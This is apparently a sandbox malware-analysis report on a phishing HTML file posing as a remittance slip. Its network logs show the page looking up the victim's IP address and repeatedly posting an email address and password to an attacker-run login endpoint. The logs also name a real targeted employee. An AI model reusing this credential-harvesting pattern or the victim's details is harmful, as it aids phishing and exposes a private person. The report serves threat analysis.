2025-02-25 16:12:47 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-02-25 16:12:47 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-02-25 16:12:47 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-02-25 16:12:47 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-02-25 16:12:47 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:58 UTC	542	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:58 UTC	462	IN	HTTP/1.1 200 OK Date: Tue, 25 Feb 2025 16:12:58 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9178fae09fed7c87-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1938&rtt_var=969&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4178&recv_bytes=1120&delivery_rate=270947&cwnd=225&unsent_bytes=0&cid=0e7d8f75c4d0364c&ts=150&x=0"
2025-02-25 16:12:58 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:58 UTC	349	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:59 UTC	429	IN	HTTP/1.1 200 OK Date: Tue, 25 Feb 2025 16:12:58 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9178fae48af8c427-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1523&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1917268&cwnd=32&unsent_bytes=0&cid=9f99d3f5f3612c90&ts=144&x=0"
2025-02-25 16:12:59 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:13:05 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:13:05 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:13:18 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=0uovcs5ocvepjgco0kvh11je8b; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:13:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:13:18 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:13:19 UTC	355	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:13:20 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:13:20 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:13:20 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:13:29 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:13:29 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:13:40 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=83410cl8qp1lasc6ogik19jhe3; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:13:40 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:13:40 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:13:41 UTC	401	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
2025-02-25 16:13:42 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:13:42 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:13:42 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:13:56 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:13:56 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:14:12 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=mpq27vdlrc847d3s42qq28db46; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:14:12 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:14:12 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:14:13 UTC	401	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
2025-02-25 16:14:14 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:14:14 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:14:14 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:14:20 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:14:20 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:14:31 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=b4amnv58742qr2tn4qob9b8jj2; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:14:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:14:31 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:14:32 UTC	401	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
2025-02-25 16:14:33 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:14:33 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:14:33 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Remittance_Slip_kodiakbp.com.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
Remittance_Slip_kodiakbp.com.htm

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:14:46 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:14:46 UTC	57	OUT	Data Raw: 61 69 3d 6a 61 73 6f 6e 2e 64 6f 75 67 6c 61 73 73 25 34 30 6b 6f 64 69 61 6b 62 70 2e 63 6f 6d 26 70 72 3d 25 32 43 42 46 25 32 43 25 33 46 54 78 64 56 45 46 25 35 45 31 Data Ascii: ai=jason.douglass%40kodiakbp.com&pr=%2CBF%2C%3FTxdVEF%5E1
2025-02-25 16:14:58 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=958t8lpp0sra6gmpv4td11a607; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 16:14:58 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:14:58 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:14:59 UTC	401	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
2025-02-25 16:15:00 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 16:15:00 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 16:15:00 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:15:10 UTC	633	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
